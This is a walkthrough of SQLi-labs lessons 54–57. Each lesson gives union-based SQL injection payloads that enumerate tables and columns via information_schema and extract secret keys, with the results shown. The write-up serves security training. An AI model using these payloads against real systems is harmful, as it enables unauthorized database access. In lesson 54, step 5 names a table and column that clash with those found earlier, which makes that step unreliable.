(union select challenges)

SQLi-labs: Lesson 54

  1. Try ?id=1
  2. Try ?id=1' or 1=1--+. It works!

  3. Get table name:

    ?id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+.

    Result:UU9VOJLJIB

  4. Get columns:

    ?id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="UU9VOJLJIB"),3--+.

    Result: id,sessid,secret_O3H5,tryy

  5. Get what you want:

    ?id=0' union select 1, (select group_concat(id,0x5c,sessid,0x5c,secret_1V9E,0x5c,tryy) from XKR10CYFA3 limit 0,1),3--+

    Result:

    Your Login name:1\32cd0b3cfed084c5c03f6aafa0bb8d13\0ZM2ob06rYCeeSkCvOUQAEVp\5
    Your Password:3

  6. Submit the secret key: 0ZM2ob06rYCeeSkCvOUQAEVp

SQLi-labs: Lesson 55

  1. Test:
    • ?id=1'--+ not work
    • ?id=1"--+ not work
    • ?id=1")--+ not work
    • ?id=1')--+ not work
    • ?id=1)--+ This works!

  2. Get table name

    Query: ?id=0) union select 1, (select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

    Result:Your Login name:I7SS1ZXRI8

  3. Get column name

    Query: ?id=0) union select 1, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="I7SS1ZXRI8"),3--+

    Result: Your Login name:id,sessid,secret_UE6M,tryy

  4. Get what you want now.

    Query: ?id=0) union select 1, (select group_concat(id,0x5c,sessid,0x5c,secret_UE6M,0x5c,tryy) from I7SS1ZXRI8 limit 0,1),3--+

    Result:

    Your Login name:1\eb83113e6503dd70bd02f04ce320abb5\kZf1se0n3QEkbMSSehNAD8sr\8
    Your Password:3

  5. Submit the secret key: kZf1se0n3QEkbMSSehNAD8sr

SQLi-labs: Lesson 56

  1. Test:
    • ?id=1--+ not work
    • ?id=1')--+ works!

  2. Get table name:

    Query: ?id=0') union select 1, (select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

    Result:Your Login name:FZQFWO9NUQ

  3. Get column name:

    Query: ?id=0') union select 1, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="FZQFWO9NUQ"),3--+

    Result: Your Login name:id,sessid,secret_ZD48,tryy

  4. Get secret key:

    Query: ?id=0') union select 1, (select group_concat(id,0x5c,sessid,0x5c,secret_ZD48,0x5c,tryy) from FZQFWO9NUQ limit 0,1),3--+

    Result:

    Your Login name:1\ffed1dfb3f479efae11b32df527ce4f8\9H2qqSmOkPFBPunQix897kZ7\7
    Your Password:3

  5. Submit the secret key: 9H2qqSmOkPFBPunQix897kZ7

SQLi-labs: Lesson 57

  1. Test:
    • ?id=-1" union select 1,2,3--+ Works!

  2. Get table name, column name, and the secret key. Queries are similar to previous lessons.

    e.g. ?id=-1" union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

results matching ""

    No results matching ""